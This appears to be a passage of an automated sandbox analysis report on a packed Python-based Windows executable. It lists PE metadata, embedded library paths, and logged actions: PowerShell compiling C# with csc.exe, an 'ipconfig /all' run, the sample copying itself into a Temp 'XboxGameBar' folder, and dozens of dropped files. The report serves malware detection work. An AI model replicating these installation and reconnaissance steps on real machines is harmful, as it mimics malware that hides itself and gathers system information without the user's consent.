                      Source: RuntimeusererVers.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: RuntimeusererVers.exeStatic file information: File size 13747712 > 1048576
                      Source: RuntimeusererVers.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcece00
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: RuntimeusererVers.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\bcrypt\bcrypt\bcrypt-4.0.1\src\_bcrypt\target\x86_64-pc-windows-msvc\release\deps\bcrypt_rust.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD6F5000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000037.00000003.1583982311.000002255BAF4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD6F5000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000037.00000003.1583982311.000002255BAF4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDC69000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B7311000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: crypto\stack\stack.cOPENSSL_sk_dupOPENSSL_sk_deep_copysk_reserveOPENSSL_sk_new_reserveOPENSSL_sk_reserveOPENSSL_sk_insertOPENSSL_sk_seti=%dcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC3.1.4built on: Fri Nov 24 00:12:45 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptoOPENSSL_atexitcrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdbcQ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: X509_SIGPKCS8_encrypt_excrypto\pkcs12\p12_p8e.cPKCS8_set0_pbe_excompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
                      Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
                      Source: python311.dll.0.drStatic PE information: section name: PyRuntim
                      Source: vcruntime140.dll.0.drStatic PE information: section name: _RDATA
                      Source: libcrypto-1_1.dll.37.drStatic PE information: section name: .00cfg
                      Source: libssl-1_1.dll.37.drStatic PE information: section name: .00cfg
                      Source: python311.dll.37.drStatic PE information: section name: PyRuntim
                      Source: vcruntime140.dll.37.drStatic PE information: section name: _RDATA
                      Source: libcrypto-1_1.dll.55.drStatic PE information: section name: .00cfg
                      Source: libssl-1_1.dll.55.drStatic PE information: section name: .00cfg
                      Source: python311.dll.55.drStatic PE information: section name: PyRuntim
                      Source: vcruntime140.dll.55.drStatic PE information: section name: _RDATA
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DCA4196 push 2B41C88Bh; iretd 48_2_00007FF81DCA419B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF7BDB92045 push eax; iretd 53_2_00007FF7BDB9233D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF7BDB90B7D pushad ; retf 53_2_00007FF7BDB90D3D
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF04196 push 2B41C88Bh; iretd 58_2_00007FF81DF0419B
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF04CBC push 2B41C88Bh; iretd 58_2_00007FF81DF04CC1

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\python3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_uuid.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\libssl-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\libffi-8.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\python311.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\python311.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\libffi-8.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\libssl-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_uuid.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\python311.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\libssl-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md__mypyc.pydJump to dropped file
